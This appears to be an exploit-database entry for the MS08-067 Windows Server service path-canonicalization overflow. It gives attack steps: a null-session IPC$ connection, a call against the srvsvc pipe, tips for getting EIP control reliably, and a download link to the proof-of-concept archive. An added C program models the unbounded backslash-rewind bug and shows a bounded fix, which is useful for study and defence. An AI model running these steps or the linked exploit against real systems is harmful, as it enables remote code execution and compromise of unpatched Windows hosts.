In vstudio command prompt:
mk.bat
next:
attach debugger to services.exe (2k) or the relevant svchost (xp/2k3/...)
net use \\IPADDRESS\IPC$ /user:user creds

die \\IPADDRESS \pipe\srvsvc

In some cases, /user:"" "" will suffice (i.e., an anonymous null-session connection).

You should get EIP -> 00 78 00 78 (the UTF-16 bytes of "xx"), a stack overflow (like a guard-page violation), an access violation, etc. However, in some cases you will get nothing.

This is because the outcome depends on the state of the stack prior to the "overflow": you need a backslash on the stack before the input buffer.

So play around a bit; you'll get it working reliably...

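Why the result depends on what sits below the buffer, as an added model written for this page (it is not netapi32's code, and the PoC in the zip is not shown here): a canonicalizer that collapses "\.." by walking its output cursor back to the previous '\' without checking where its buffer starts will, for a path that begins with "\..\", keep scanning into whatever memory lies under the buffer. If a backslash happens to be there, the scan stops on it and the rest of the path is written from that point; if not, the scan runs off into unmapped memory. The arena layout, the BUF_OFF split, the status codes and the function names are all assumptions of this model; 16-bit units stand in for WCHARs (0x0078 is 'x'). The bounded mode at the end is the obvious fix.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Model of the bug class behind this PoC, written for this page; not
 * netapi32's code, and the memory layout below is invented. */

typedef uint16_t wch;   /* stands in for WCHAR */

/* arena[0..BUF_OFF-1] models stack contents below the input buffer,
 * arena[BUF_OFF..] is the path buffer handed to the canonicalizer. */
enum { ARENA_LEN = 64, BUF_OFF = 16 };

typedef struct {
    int status;      /* 0 = ok, 1 = rejected (bounded mode), 2 = scan ran off modelled memory */
    int cursor_min;  /* lowest arena index the output cursor reached; < BUF_OFF means out of bounds */
} canon_result;

static int is_dotdot(const wch *p) {
    return p[0] == '\\' && p[1] == '.' && p[2] == '.' && (p[3] == '\\' || p[3] == 0);
}

/* Lay out the modelled stack: `below` (up to BUF_OFF ASCII chars) fills the
 * region under the buffer, `path` is placed in the buffer as 16-bit units. */
static void setup(wch *arena, const char *below, const char *path) {
    int i;
    memset(arena, 0, ARENA_LEN * sizeof(wch));
    for (i = 0; i < BUF_OFF && below[i]; i++) arena[i] = (wch)(unsigned char)below[i];
    for (i = 0; path[i]; i++) arena[BUF_OFF + i] = (wch)(unsigned char)path[i];
    arena[BUF_OFF + i] = 0;
}

/* In-place canonicalization of arena[BUF_OFF..]. With bounded == 0 the rewind
 * loop is the vulnerable pattern (no lower bound below the buffer); with
 * bounded == 1 it refuses to rewind past the start of the buffer. */
static canon_result canonicalize(wch *arena, int bounded) {
    wch *buf = arena + BUF_OFF;
    const wch *in = buf;
    wch *out = buf;
    wch *lower = bounded ? buf : arena;   /* where the scan is allowed to stop looking */
    canon_result r = { 0, BUF_OFF };

    while (*in) {
        if (is_dotdot(in)) {
            /* Pop the last emitted component: step back, then scan for the
             * '\' that began it. Unbounded, nothing stops the scan at `buf`,
             * so it reads the "stack" under the buffer and later writes there. */
            if (out == lower) { r.status = bounded ? 1 : 2; return r; }
            out--;
            while (*out != '\\') {
                if (out == lower) { r.status = bounded ? 1 : 2; return r; }
                out--;
            }
            if (out - arena < r.cursor_min) r.cursor_min = (int)(out - arena);
            in += 3;             /* consume "\.."; a following '\' starts the next component */
            continue;
        }
        *out++ = *in++;          /* ordinary unit: copy through */
    }
    *out = 0;
    return r;
}

/* Convenience: lay out one scenario and canonicalize it. */
static canon_result run_case(wch *arena, const char *below, const char *path, int bounded) {
    setup(arena, below, path);
    return canonicalize(arena, bounded);
}

int main(void) {
    wch arena[ARENA_LEN];
    canon_result r;

    r = run_case(arena, "AAAAAAAAAAAAAAAA", "\\..\\x", 0);
    printf("no '\\' below the buffer: status %d (scan runs off the stack: AV)\n", r.status);
    r = run_case(arena, "AAAAA\\AAAAAAAAAA", "\\..\\x", 0);
    printf("'\\' at arena[5]        : status %d, cursor reached %d, wrote 0x%04x at arena[6]\n",
           r.status, r.cursor_min, arena[6]);
    r = run_case(arena, "AAAAA\\AAAAAAAAAA", "\\..\\x", 1);
    printf("bounded canonicalizer  : status %d (path rejected)\n", r.status);
    return 0;
}
```

The second case is the page's "slash on the stack prior to the input buffer": the scan stops on the stray backslash at arena[5] and the remainder of the path lands below the buffer, at offsets the attacker controls through the number of "\.." components. The first case is the "you get nothing / access violation" outcome, where no backslash exists below the buffer in the modelled memory.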
poc:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/6824.zip (2008-ms08-067.zip)

# milw0rm.com [2008-10-23]